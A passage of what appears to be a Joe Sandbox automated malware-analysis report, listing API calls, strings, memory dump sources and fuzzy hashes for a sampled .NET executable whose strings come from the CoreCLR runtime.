• MODIFIABLE_ASSEMBLIES, xrefs: 010D32FC
• System.Runtime.TieredCompilation.CallCountThreshold, xrefs: 010D3867
• debug, xrefs: 010D337E
                                                                                                                                                                                                                          • LogCCWRefCountChange, xrefs: 010D36BE
                                                                                                                                                                                                                          • System.GC.LOHThreshold, xrefs: 010D321B
                                                                                                                                                                                                                          • RestrictedGCStressExe, xrefs: 010D30BC
                                                                                                                                                                                                                          • System.Runtime.TieredCompilation.CallCountingDelayMs, xrefs: 010D389C
                                                                                                                                                                                                                          • System.Runtime.TieredCompilation.QuickJitForLoops, xrefs: 010D382D
                                                                                                                                                                                                                          • System.Runtime.TieredCompilation, xrefs: 010D37FD
                                                                                                                                                                                                                          • StartupDelayMS, xrefs: 010D372C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$_errnowcstoul$_wcsicmp
                                                                                                                                                                                                                          • String ID: LogCCWRefCountChange$MODIFIABLE_ASSEMBLIES$ReadyToRunExcludeList$RestrictedGCStressExe$StartupDelayMS$System.GC.Concurrent$System.GC.LOHThreshold$System.Runtime.InteropServices.BuiltInComInterop.IsSupported$System.Runtime.TieredCompilation$System.Runtime.TieredCompilation.CallCountThreshold$System.Runtime.TieredCompilation.CallCountingDelayMs$System.Runtime.TieredCompilation.QuickJit$System.Runtime.TieredCompilation.QuickJitForLoops$System.Runtime.TieredPGO$ZapBBInstr$debug$true
                                                                                                                                                                                                                          • API String ID: 3256802023-3551552797
                                                                                                                                                                                                                          • Opcode ID: d734e70fe4d899ee19385f4734940d2352e4ac599a2f4ea7b3cb2ede5de2aeae
                                                                                                                                                                                                                          • Instruction ID: 277e49d0fafe7ac658b4b7a4430d74aa4d2bd4ae2d5bb0b24c549d2d708729dd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d734e70fe4d899ee19385f4734940d2352e4ac599a2f4ea7b3cb2ede5de2aeae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC7223B0A113969BEB61DB28C8447E9BBF2BF55300F0445E9C5499F385EB709E84CF92

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateNamedPipeA.KERNEL32(00000000,40080003,00000008,000000FF,00004000,00004000,00000000,00000000), ref: 01252255
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0125226E
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000118,00000000,00000000,00000002), ref: 01252291
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 0125229E
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(00000000), ref: 012522A5
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 012522B3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Cannot call Listen on a client connection, xrefs: 01252205
                                                                                                                                                                                                                          • A client process failed to connect., xrefs: 0125231B
                                                                                                                                                                                                                          • Failed to ownership sentinel., xrefs: 012522BA
                                                                                                                                                                                                                          • Failed to create overlap event, xrefs: 012522E4
                                                                                                                                                                                                                          • Failed to create an instance of a named pipe., xrefs: 01252275
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentErrorLastProcess$CreateDuplicateHandleNamedPipe
                                                                                                                                                                                                                          • String ID: A client process failed to connect.$Cannot call Listen on a client connection$Failed to create an instance of a named pipe.$Failed to create overlap event$Failed to ownership sentinel.
                                                                                                                                                                                                                          • API String ID: 1242093035-1870640685
                                                                                                                                                                                                                          • Opcode ID: ee24becb48aac29812abe759ef6dcc9074bf608ce97a3e52213dc3f35c99f6c5
                                                                                                                                                                                                                          • Instruction ID: 9b93bae4a952db5c0f557ce4e6a7fed2b37b4e47dd714132f13bed6c3dff928b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee24becb48aac29812abe759ef6dcc9074bf608ce97a3e52213dc3f35c99f6c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E310431750212FBE77A1739AC8ABE9BA48BB00B21F110219FF11E52E1C770585187A2

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 01215217
                                                                                                                                                                                                                          • GetNumaHighestNodeNumber.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 01215250
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,01419A2D,?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 01215276
                                                                                                                                                                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 0121527D
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 012152C9
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000004,?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 012152E1
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 01215347
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000010,?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 0121535F
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 01215446
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000004,?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 0121545E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Process$Alloc$AffinityCurrentHighestInfoMaskNodeNumaNumberSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4161135185-0
                                                                                                                                                                                                                          • Opcode ID: b1c5faf45aa4e329e7faa9de7bba51c99a4bcc3317ba44150d33d82914a59ff6
                                                                                                                                                                                                                          • Instruction ID: d13b9f3736121a96d1de229cf910912dcd80042526d9e2d7728b9886c32eda33
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1c5faf45aa4e329e7faa9de7bba51c99a4bcc3317ba44150d33d82914a59ff6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5A166B66102418FEB39CF69FC4C79A3BE4FB96309F446059E5059B358D77284A8CFA0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(000000AC,7CAB6A82,01506474,00000000,?), ref: 01099D4D
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                            • Part of subcall function 01215D00: GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                            • Part of subcall function 011517D0: SleepEx.KERNEL32(00000001,00000000), ref: 011518D3
                                                                                                                                                                                                                            • Part of subcall function 011517D0: SwitchToThread.KERNEL32(7CAB6A82,00000000,?,03C19D40), ref: 011518D9
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: _swprintf.LIBCMT ref: 0109CAC4
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CAD8
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: WriteFile.KERNEL32(?,00000000), ref: 0109CAED
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: _swprintf.LIBCMT ref: 0109CB0D
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CB21
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: WriteFile.KERNEL32(?,00000000), ref: 0109CB36
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: _swprintf.LIBCMT ref: 0109CB56
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CB6A
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: WriteFile.KERNEL32(?,00000000), ref: 0109CB7F
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: _swprintf.LIBCMT ref: 0109CB9F
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CBB3
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: WriteFile.KERNEL32(?,00000000), ref: 0109CBC8
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,7CAB6A82,00000000,00001000,00000000), ref: 0109A666
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,7CAB6A82,00000000,00001000,00000000), ref: 0109A68F
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,7CAB6A82,00000000,00001000,00000000), ref: 0109A6C9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • VirtualCallStubManagerManager::AddStubManager - 0x%p (vptr 0x%p), xrefs: 0109A375
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHeapWrite_swprintfstrlen$CriticalSection$AllocateDeleteProcess$FreeInitializeSleepSwitchThreadVirtual
                                                                                                                                                                                                                          • String ID: VirtualCallStubManagerManager::AddStubManager - 0x%p (vptr 0x%p)
                                                                                                                                                                                                                          • API String ID: 691010103-2064279654
                                                                                                                                                                                                                          • Opcode ID: ee4a7d22d99bda4a1c3dcb77396ccf3dcc3c94afc278e7ed1c518492d7c02707
                                                                                                                                                                                                                          • Instruction ID: 1896a3958db51f4ff62a376e461a00c8e3347381d5ee9713b02a292136316923
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee4a7d22d99bda4a1c3dcb77396ccf3dcc3c94afc278e7ed1c518492d7c02707
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00627CB0A00246DFEF15CFA8C8947AEBBF0BF58300F1441ADE949AB381DB759944DB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,?,00000004,00000001,00000000,?,?,00000000,00000000,00000000), ref: 01114C7B
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,00000004,00000001,00000000,?,?,00000000,00000000,00000000), ref: 01114FEE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 32dae99124a6a04f37c36a0cfaf5687cd6577d7923136cd646f875c8d07965cd
                                                                                                                                                                                                                          • Instruction ID: 150648a1c814cdd82cda390517211be768f518ae880948c00cf88b0f46aff1ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32dae99124a6a04f37c36a0cfaf5687cd6577d7923136cd646f875c8d07965cd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D52B570A00229CFEB29CF28C851BAEFBF2BF45704F1541A9D549AB685DB349D81CF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 012D2176
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000030,00000000,00000000,00000000,00000000,?), ref: 012D2193
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Process$AllocAllocate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1154092256-0
                                                                                                                                                                                                                          • Opcode ID: 143285d17efbabde225fd2878a4d19b2d10e95cc4b30b193be57065ce48c99e9
                                                                                                                                                                                                                          • Instruction ID: dac26035f781290f2988e29c63d3ab222e6958fa3e8b63e58d3ba8071274f257
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 143285d17efbabde225fd2878a4d19b2d10e95cc4b30b193be57065ce48c99e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26419C75600705AFD721DFA9E840B5ABBE4EF68611F00452EEA89D7351E731E914CB90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Failed to add static field to instantiated type instance, xrefs: 00FEA087
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Failed to add static field to instantiated type instance
                                                                                                                                                                                                                          • API String ID: 0-225272292
                                                                                                                                                                                                                          • Opcode ID: 07d5c6ea3caf50be56ab9b77f563605afdc51fcc9d58f8745ce6867b6957cc29
                                                                                                                                                                                                                          • Instruction ID: a2e049129e7215a54e011a79a49477602532852b315a0227bba1a8fbe1732901
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07d5c6ea3caf50be56ab9b77f563605afdc51fcc9d58f8745ce6867b6957cc29
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF17E716083859FCB04DF29C890A6EB7E5FF88314F14892DFD958B290DB74E905DBA2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d2e9493b2dfb185429912322e89605e0129873b489216f65cad8520e770f1d58
                                                                                                                                                                                                                          • Instruction ID: 020065074ab9229dde2ae3617352759ad4f1b3336b8ecf18d760d2f79b2c0645
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2e9493b2dfb185429912322e89605e0129873b489216f65cad8520e770f1d58
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB32E671E001168FEF29CF68C8657FEBFF2AB85300F15815AE696EB281D7359901EB50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AF80: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,0151591C,?,01136CBA), ref: 0121AFD0
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 012D8AD8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012D8B57
                                                                                                                                                                                                                            • Part of subcall function 012D8800: strtok_s.API-MS-WIN-CRT-STRING-L1-1-0(?,015B451C,00000000,00000000,?,00000000,012D8C0E), ref: 012D8818
                                                                                                                                                                                                                            • Part of subcall function 012D8800: strtok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,015B451C,?), ref: 012D8864
                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,listen,00000000,00000000), ref: 012D8CF4
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 012D8DB5
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 012D8E91
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D8EB4
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 012D8EDD
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D8F00
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 012D8F0F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • suspend, xrefs: 012D8D46
                                                                                                                                                                                                                          • ds_port_builder_set_tag - Unknown tag '%s'., xrefs: 012D8D7B
                                                                                                                                                                                                                          • failed, xrefs: 012D8E35
                                                                                                                                                                                                                          • nosuspend, xrefs: 012D8D2B
                                                                                                                                                                                                                          • listen, xrefs: 012D8CEE
                                                                                                                                                                                                                          • succeeded, xrefs: 012D8E3A, 012D8E42
                                                                                                                                                                                                                          • connect, xrefs: 012D8D0C
                                                                                                                                                                                                                          • ds_ipc_stream_factory_configure - Ignoring port configuration with empty address, xrefs: 012D8DDD
                                                                                                                                                                                                                          • ds_ipc_stream_factory_configure - Attempted to create Diagnostic Port from "%s"., xrefs: 012D8C44
                                                                                                                                                                                                                          • ds_ipc_stream_factory_configure - Diagnostic Port creation %s, xrefs: 012D8E43
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$FreeHeapstrtok_s$ByteCharMultiWide_stricmpisspace
                                                                                                                                                                                                                          • String ID: connect$ds_ipc_stream_factory_configure - Attempted to create Diagnostic Port from "%s".$ds_ipc_stream_factory_configure - Diagnostic Port creation %s$ds_ipc_stream_factory_configure - Ignoring port configuration with empty address$ds_port_builder_set_tag - Unknown tag '%s'.$failed$listen$nosuspend$succeeded$suspend
                                                                                                                                                                                                                          • API String ID: 1069159200-1518389490
                                                                                                                                                                                                                          • Opcode ID: dfc983677c0406376adbe69445f2ca3628ac7c5ca59457a818bd66f9c119295e
                                                                                                                                                                                                                          • Instruction ID: c118e9d0e39026e4a7b3465a200c098cadf0ad876de6ee0de8ba5af152468631
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfc983677c0406376adbe69445f2ca3628ac7c5ca59457a818bd66f9c119295e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55E12DB0A113159FEF209F18DC45BAA7BB5EF94304F0441ACEA09AB385DBB29960CF51

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(0163F09C,7CAB6A82,00000000,?,00000000), ref: 0141850C
                                                                                                                                                                                                                          • SetConsoleCtrlHandler.KERNEL32(01418330,00000001,?,00000000), ref: 0141852D
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 01418538
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitializeContext2), ref: 01418544
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,00000000), ref: 01418554
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RtlRestoreContext), ref: 01418566
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EE00,?,00000000), ref: 014185B4
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EE24,?,00000000), ref: 014185E5
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EAD0,?,00000000), ref: 01418616
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EFC8,?,00000000), ref: 01418649
                                                                                                                                                                                                                            • Part of subcall function 012CE600: GetActiveProcessorGroupCount.KERNEL32 ref: 012CE639
                                                                                                                                                                                                                            • Part of subcall function 012CE600: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C,?,000000A1,?,?,?,014186CE,00FC0000,?,?,00000000), ref: 012CE670
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EE94,?,00000000,?,00FC0000,00000000,00FC0000,?,?,00000000), ref: 014187D2
                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,00000000), ref: 01418DD2
                                                                                                                                                                                                                            • Part of subcall function 0121AF80: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,0151591C,?,01136CBA), ref: 0121AFD0
                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,00000000,?,00FC0000,00000000,00FC0000,?,?,00000000), ref: 014188E4
                                                                                                                                                                                                                          • SleepEx.KERNEL32(00000000,00000000,?,00000000,?,00FC0000,00000000,00FC0000,?,?,00000000), ref: 014188FF
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EEE4,?,00000000,?,00FC0000,00000000,00FC0000,?,?,00000000), ref: 01418919
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EA90,?,00000000,?,00FC0000,00000000,00FC0000,?,?,00000000), ref: 01418956
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalInitializeSection$AddressBreakDebugHandleModuleProc$ActiveConsoleCountCtrlFreeGroupHandlerHeapInfoProcessorSleepSystemmalloc
                                                                                                                                                                                                                          • String ID: %s completed$%s failed with code %x$===================EEStartup Starting===================$EnsureRtlFunctions()$InitializeContext2$Returned successfully from InitThreadManager$RtlRestoreContext$g_pConfig->sync()$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 3857905088-983475224
                                                                                                                                                                                                                          • Opcode ID: 44c9221177ad3e36eeb1361b3383fb672fcad465ed9e419126cd26297ef03a0e
                                                                                                                                                                                                                          • Instruction ID: 930391919ed39a26b083425ef06d02b2de43290c4e4d15063317b76e516e8df7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44c9221177ad3e36eeb1361b3383fb672fcad465ed9e419126cd26297ef03a0e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6C1B074A113469FE720EFA9DC45BAE7BB0BB54304F10445EE805A7398EBB59910CB72

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000040,7CAB6A82,00000000,?,00000000,?,00000000), ref: 01084E46
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(014AABB8,00000129,00000040,?,7CAB6A82,00000000,?,00000000,?,00000000), ref: 010850EC
                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,?,00000000,?,00000000), ref: 0108512E
                                                                                                                                                                                                                          • SetThreadStackGuarantee.KERNEL32(?), ref: 0108514D
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,014AA6B8,?,014AACB0,?,014AAC80,?,014AAC50,?,014AABF0,?,014AAC20,?,014AABC0,?,00000000), ref: 01085157
                                                                                                                                                                                                                            • Part of subcall function 0122E910: LeaveCriticalSection.KERNEL32(03C71B78,?,00000000,7CAB6A82,00000000,00000129,00000000,01084E25,7CAB6A82,00000000), ref: 0122E98C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • @WriteBarrierEBP, xrefs: 01085079
                                                                                                                                                                                                                          • (BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart > (ptrdiff_t)0, xrefs: 0108519A
                                                                                                                                                                                                                          • @WriteBarrier, xrefs: 010850B8, 010850D1
                                                                                                                                                                                                                          • @WriteBarrierESI, xrefs: 01084FE1
                                                                                                                                                                                                                          • (BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart < (ptrdiff_t)GetOsPageSize(), xrefs: 010851AE
                                                                                                                                                                                                                          • @WriteBarrierEDI, xrefs: 0108502D
                                                                                                                                                                                                                          • @WriteBarrierECX, xrefs: 01084F49
                                                                                                                                                                                                                          • @WriteBarrierEAX, xrefs: 01084EFD
                                                                                                                                                                                                                          • @WriteBarrierEBX, xrefs: 01084F95
                                                                                                                                                                                                                          • D:\a\_work\1\s\src\coreclr\vm\threads.cpp, xrefs: 010851A4, 010851B8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual$CriticalErrorGuaranteeLastLeaveProtectSectionStackThread
                                                                                                                                                                                                                          • String ID: (BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart < (ptrdiff_t)GetOsPageSize()$(BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart > (ptrdiff_t)0$@WriteBarrier$@WriteBarrierEAX$@WriteBarrierEBP$@WriteBarrierEBX$@WriteBarrierECX$@WriteBarrierEDI$@WriteBarrierESI$D:\a\_work\1\s\src\coreclr\vm\threads.cpp
                                                                                                                                                                                                                          • API String ID: 3484155556-337905575
                                                                                                                                                                                                                          • Opcode ID: c960151dda449cdb9f6e5e2b2741c740ca1f7d953f356fc553560365953e95de
                                                                                                                                                                                                                          • Instruction ID: d5895dd6b4ec4f9c9f617d8401cd4b44cad21480baddc9934c1d7cdb960cdc14
